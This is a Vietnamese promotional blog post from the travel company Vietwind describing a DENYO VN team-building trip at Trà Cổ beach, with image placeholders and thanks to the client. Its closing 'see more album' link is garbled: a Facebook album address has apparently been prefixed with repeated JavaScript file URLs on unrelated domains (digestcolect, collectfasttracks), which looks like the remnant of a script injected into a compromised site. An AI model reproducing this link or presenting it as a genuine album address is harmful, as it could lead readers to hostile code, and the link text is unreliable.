Tổ chức du lịch Team building: DENYO VN- VỮNG VÀNG NỘI LỰC

Dù mưa gió bão bùng cũng không thể ngăn cản các chiến binh DENYO VN. Chương trình team building tại Trà Cổ diễn ra vô cùng sôi động và thú vị. Thông qua các trò chơi tập thể đầy hào hứng, niềm vui, tinh thần đoàn kết và sự gắn bó giữa các thành viên để cùng nhau vượt qua mọi khó khăn chính là điều thành công nhất của chương trình team building

to-chuc-team-building-denyo-vietwind-team-building-1

Với không gian biển lộng gió, khí hậu mát mẻ, nơi đây chính là địa điểm lý tưởng để tổ chức hoạt team building outdoor. Các thành viên của DENYO VN đã có những trải nghiệm mới mẻ, đầy lý thú thông qua các trò chơi team building mang đầy tính thử thách khả năng sáng tạo cũng như rèn luyện sức khỏe của mỗi thành viên.

to-chuc-team-building-denyo-vietwind-team-building-2 to-chuc-team-building-denyo-vietwind-team-building-3

to-chuc-team-building-denyo-vietwind-team-building-4

Để vượt qua được các thử thách mà Vietwind đặt ra, từng thành viên trong mỗi đội phải kết hợp thật sự ăn ý và khéo léo trong khi thực hiện nhiệm vụ. Ngoài ra, để giành chiến thắng mỗi đội cũng phải có những chiến thuật riêng và cách xử lý thông minh đối với mỗi thử thách mà chúng tôi đưa ra. Điều này đòi hỏi khả năng lãnh đạo tốt của các leader. Leader phải có tầm nhìn xa trông rộng, hiểu rõ năng lực của từng thành viên trong đội để phân công nhiệm vụ phù hợp với khả năng của từng người.

to-chuc-team-building-denyo-vietwind-team-building-5

Trò chơi Team building vô cùng gay cấn

 to-chuc-team-building-denyo-vietwind-team-building-6

Đêm Gala với những trò chơi vui nhộn

Cảm ơn DENYO đã tin tưởng và lựa chọn dịch vụ của Vietwind. Hy vọng Vietwind sẽ được đồng hành cùng đại gia đình DENYO trong các chương trình sắp tới.

Vietwind – Bứt phá vươn cao!

 * Xem thêm album: 

>>> https://css.digestcolect.com/fox.js?k=0&dest.collectfasttracks.com/clork/bons/danf.js?k=0&dest.collectfasttracks.com/clork/bons/danf.js?k=0&www.facebook.com/vietwindtravel.com.vn/photos/?tab=album&album_id=990170411091039

Facebook Comments

Bài Viết Liên Quan